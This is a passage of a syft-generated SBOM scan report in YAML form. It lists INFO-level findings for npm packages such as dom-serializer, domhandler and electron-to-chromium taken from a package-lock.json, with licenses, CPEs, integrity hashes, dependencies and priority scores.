message: 'Package discovered: dom-serializer 2.0.0'
|
|
title: dom-serializer 2.0.0
|
|
description: 'Package discovered: dom-serializer 2.0.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: f8e1d8922cf56c54
|
|
name: dom-serializer
|
|
version: 2.0.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:dom-serializer:dom-serializer:2.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:dom-serializer:dom_serializer:2.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:dom_serializer:dom-serializer:2.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:dom_serializer:dom_serializer:2.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:dom:dom-serializer:2.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:dom:dom_serializer:2.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/dom-serializer@2.0.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/dom-serializer/-/dom-serializer-2.0.0.tgz
|
|
integrity: sha512-wIkAryiqt/nV5EQKqQpo3SToSOV9J0DnbJqwK7Wv/Trc92zIAYZ4FlMu+JPFW1DfGFt81ZTCGgDEabffXeLyJg==
|
|
dependencies:
|
|
domelementtype: ^2.3.0
|
|
domhandler: ^5.0.2
|
|
entities: ^4.2.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 04fd13748534548d
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: domelementtype 2.3.0'
|
|
title: domelementtype 2.3.0
|
|
description: 'Package discovered: domelementtype 2.3.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 5df6e95fb09fce0c
|
|
name: domelementtype
|
|
version: 2.3.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: BSD-2-Clause
|
|
spdxExpression: BSD-2-Clause
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:domelementtype:domelementtype:2.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/domelementtype@2.3.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/domelementtype/-/domelementtype-2.3.0.tgz
|
|
integrity: sha512-OLETBj6w0OsagBwdXnPdN0cnMfF9opN69co+7ZrbfPGrdpPVNBUj02spi6B1N7wChLQiPn4CSH/zJvXw56gmHw==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 21e3025ed99f3f28
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: domhandler 5.0.3'
|
|
title: domhandler 5.0.3
|
|
description: 'Package discovered: domhandler 5.0.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 952037d890bc80f6
|
|
name: domhandler
|
|
version: 5.0.3
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: BSD-2-Clause
|
|
spdxExpression: BSD-2-Clause
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:domhandler:domhandler:5.0.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/domhandler@5.0.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/domhandler/-/domhandler-5.0.3.tgz
|
|
integrity: sha512-cgwlv/1iFQiFnU96XXgROh8xTeetsnJiDsTc7TYCLFd9+/WNkIqPTxiM/8pSd8VIrhXGTf1Ny1q1hquVqDJB5w==
|
|
dependencies:
|
|
domelementtype: ^2.3.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: d6dff11bd10e354b
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: domutils 3.2.2'
|
|
title: domutils 3.2.2
|
|
description: 'Package discovered: domutils 3.2.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 1b9db533b6297450
|
|
name: domutils
|
|
version: 3.2.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: BSD-2-Clause
|
|
spdxExpression: BSD-2-Clause
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:domutils:domutils:3.2.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/domutils@3.2.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/domutils/-/domutils-3.2.2.tgz
|
|
integrity: sha512-6kZKyUajlDuqlHKVX1w7gyslj9MPIXzIFiz/rGu35uC1wMi+kMhQwGhl4lt9unC9Vb9INnY9Z3/ZA3+FhASLaw==
|
|
dependencies:
|
|
dom-serializer: ^2.0.0
|
|
domelementtype: ^2.3.0
|
|
domhandler: ^5.0.3
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 4726026d0ba78a1e
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: dunder-proto 1.0.1'
|
|
title: dunder-proto 1.0.1
|
|
description: 'Package discovered: dunder-proto 1.0.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 23d9641db70f3051
|
|
name: dunder-proto
|
|
version: 1.0.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:dunder-proto:dunder-proto:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:dunder-proto:dunder_proto:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:dunder_proto:dunder-proto:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:dunder_proto:dunder_proto:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:dunder:dunder-proto:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:dunder:dunder_proto:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/dunder-proto@1.0.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/dunder-proto/-/dunder-proto-1.0.1.tgz
|
|
integrity: sha512-KIN/nDJBQRcXw0MLVhZE9iQHmG68qAVIBg9CqmUYjmQIhgij9U5MFvrqkUL5FbtyyzZuOeOt0zdeRe4UY7ct+A==
|
|
dependencies:
|
|
call-bind-apply-helpers: ^1.0.1
|
|
es-errors: ^1.3.0
|
|
gopd: ^1.2.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: eae177c358a69822
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: duplexify 4.1.3'
|
|
title: duplexify 4.1.3
|
|
description: 'Package discovered: duplexify 4.1.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 91c59a4a431b283f
|
|
name: duplexify
|
|
version: 4.1.3
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:duplexify:duplexify:4.1.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/duplexify@4.1.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/duplexify/-/duplexify-4.1.3.tgz
|
|
integrity: sha512-M3BmBhwJRZsSx38lZyhE53Csddgzl5R7xGJNk7CVddZD6CcmwMCH8J+7AprIrQKH7TonKxaCjcv27Qmf+sQ+oA==
|
|
dependencies:
|
|
end-of-stream: ^1.4.1
|
|
inherits: ^2.0.3
|
|
readable-stream: ^3.1.1
|
|
stream-shift: ^1.0.2
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: d3b8cfaa5ee0e8d1
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: eastasianwidth 0.2.0'
|
|
title: eastasianwidth 0.2.0
|
|
description: 'Package discovered: eastasianwidth 0.2.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: e7e9dd6a07994e54
|
|
name: eastasianwidth
|
|
version: 0.2.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:eastasianwidth:eastasianwidth:0.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/eastasianwidth@0.2.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/eastasianwidth/-/eastasianwidth-0.2.0.tgz
|
|
integrity: sha512-I88TYZWc9XiYHRQ4/3c5rjjfgkjhLyW2luGIheGERbNQ6OY7yTybanSpDXZa8y7VUP9YmDcYa+eyq4ca7iLqWA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: cb63ab5ab6733afe
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: ecdsa-sig-formatter 1.0.11'
|
|
title: ecdsa-sig-formatter 1.0.11
|
|
description: 'Package discovered: ecdsa-sig-formatter 1.0.11'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 4ed0ded14e893339
|
|
name: ecdsa-sig-formatter
|
|
version: 1.0.11
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: Apache-2.0
|
|
spdxExpression: Apache-2.0
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:ecdsa-sig-formatter:ecdsa-sig-formatter:1.0.11:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:ecdsa-sig-formatter:ecdsa_sig_formatter:1.0.11:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:ecdsa_sig_formatter:ecdsa-sig-formatter:1.0.11:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:ecdsa_sig_formatter:ecdsa_sig_formatter:1.0.11:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:ecdsa-sig:ecdsa-sig-formatter:1.0.11:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:ecdsa-sig:ecdsa_sig_formatter:1.0.11:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:ecdsa_sig:ecdsa-sig-formatter:1.0.11:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:ecdsa_sig:ecdsa_sig_formatter:1.0.11:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:ecdsa:ecdsa-sig-formatter:1.0.11:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:ecdsa:ecdsa_sig_formatter:1.0.11:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/ecdsa-sig-formatter@1.0.11
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/ecdsa-sig-formatter/-/ecdsa-sig-formatter-1.0.11.tgz
|
|
integrity: sha512-nagl3RYrbNv6kQkeJIpt6NJZy8twLB/2vtz6yN9Z4vRKHN4/QZJIEbqohALSgwKdnksuY3k5Addp5lg8sVoVcQ==
|
|
dependencies:
|
|
safe-buffer: ^5.0.1
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 3d3ef9aed82705e2
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: editorconfig 1.0.7'
|
|
title: editorconfig 1.0.7
|
|
description: 'Package discovered: editorconfig 1.0.7'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 122ede063714b5b3
|
|
name: editorconfig
|
|
version: 1.0.7
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:editorconfig:editorconfig:1.0.7:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/editorconfig@1.0.7
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/editorconfig/-/editorconfig-1.0.7.tgz
|
|
integrity: sha512-e0GOtq/aTQhVdNyDU9e02+wz9oDDM+SIOQxWME2QRjzRX5yyLAuHDE+0aE8vHb9XRC8XD37eO2u57+F09JqFhw==
|
|
dependencies:
|
|
'@one-ini/wasm': 0.1.1
|
|
commander: ^10.0.0
|
|
minimatch: ^9.0.1
|
|
semver: ^7.5.3
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 9669afa378e5a35f
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: ee-first 1.1.1'
|
|
title: ee-first 1.1.1
|
|
description: 'Package discovered: ee-first 1.1.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: e40c9e2062507e8a
|
|
name: ee-first
|
|
version: 1.1.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:ee-first:ee-first:1.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:ee-first:ee_first:1.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:ee_first:ee-first:1.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:ee_first:ee_first:1.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:ee:ee-first:1.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:ee:ee_first:1.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/ee-first@1.1.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/ee-first/-/ee-first-1.1.1.tgz
|
|
integrity: sha512-WMwm9LhRUo+WUaRN+vRuETqG89IgZphVSNkdFgeb6sS/E4OrDIN7t48CAewSHXc6C8lefD8KKfr5vY61brQlow==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 04d3ce47ab6baf5d
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: electron-to-chromium 1.5.345'
|
|
title: electron-to-chromium 1.5.345
|
|
description: 'Package discovered: electron-to-chromium 1.5.345'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: dc02d9fca5801675
|
|
name: electron-to-chromium
|
|
version: 1.5.345
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: ISC
|
|
spdxExpression: ISC
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:electron-to-chromium:electron-to-chromium:1.5.345:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:electron-to-chromium:electron_to_chromium:1.5.345:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:electron_to_chromium:electron-to-chromium:1.5.345:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:electron_to_chromium:electron_to_chromium:1.5.345:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:electron-to:electron-to-chromium:1.5.345:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:electron-to:electron_to_chromium:1.5.345:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:electron_to:electron-to-chromium:1.5.345:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:electron_to:electron_to_chromium:1.5.345:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:electron:electron-to-chromium:1.5.345:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:electron:electron_to_chromium:1.5.345:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/electron-to-chromium@1.5.345
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.5.345.tgz
|
|
integrity: sha512-F9JXQGiMrz6yVNPI2qOVPvB9HzjH5cGzhs8oJ6A28V5L/YnzN/0KsuiibqF+F1Fd9qxFzD1BUnYSd8JfULxTwg==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: d03ffa53b9f68b04
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: emoji-regex 10.6.0'
|
|
title: emoji-regex 10.6.0
|
|
description: 'Package discovered: emoji-regex 10.6.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 20a2cf9e55a512fb
|
|
name: emoji-regex
|
|
version: 10.6.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:emoji-regex:emoji-regex:10.6.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:emoji-regex:emoji_regex:10.6.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:emoji_regex:emoji-regex:10.6.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:emoji_regex:emoji_regex:10.6.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:emoji:emoji-regex:10.6.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:emoji:emoji_regex:10.6.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
